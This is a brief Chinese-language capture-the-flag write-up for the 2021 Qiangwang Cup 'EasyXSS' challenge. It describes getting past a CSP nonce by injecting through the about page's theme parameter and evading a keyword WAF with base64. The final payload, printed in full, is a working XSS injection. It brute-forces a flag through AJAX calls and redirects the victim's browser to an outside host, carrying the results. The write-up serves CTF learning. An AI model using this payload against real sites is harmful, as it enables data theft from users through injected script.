强网杯2021 EasyXSS WriteUP

端午无聊简单做个题

首先查看所有功能,发现有个search和write没有过滤,但是由于有CSP策略,通过Nonce来限制script运行,所以XSS点无效。

再看about页面中会自动添加入title,因此考虑将title中script进行修改;

注入poc后验证弹窗成功了。

about?theme=";alert(1);//

因此尝试写payload

但是在利用过程中,发现了一些莫名其妙的信息丢失,考虑可能存在WAF,不管了,WAF了 空格|ge t|split|flag{等字符串,因此尝试通过base64去绕过WAF

最终payload

http://localhost:8888/about?theme=";urls="http://www.bertramc.cn:9999/?test=";f=atob("ZmxhZ3s2YmI3N2Y4Yi02YmM4LTRiOWUtYjY1NC04YTRkYTVhZTkyMGQ=");url="/flag?var=";s=["a","b","c","d","e","f","0","1","2","3","4","5","6","7","8","9","-","}"];$.each(s,function(i,v){tu="";tf="";tf=f%2bv;$.ajax({type:atob("R0VU"),url:url%2btf,success:function(res){window.location=urls%2bres;},error:function(){}});});//

此处评论已关闭